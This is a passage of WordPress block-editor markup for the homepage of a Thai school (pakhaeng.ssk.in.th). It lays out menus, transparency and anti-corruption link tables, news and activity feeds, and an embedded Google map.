class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลสิ่งก่อสร้าง</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- 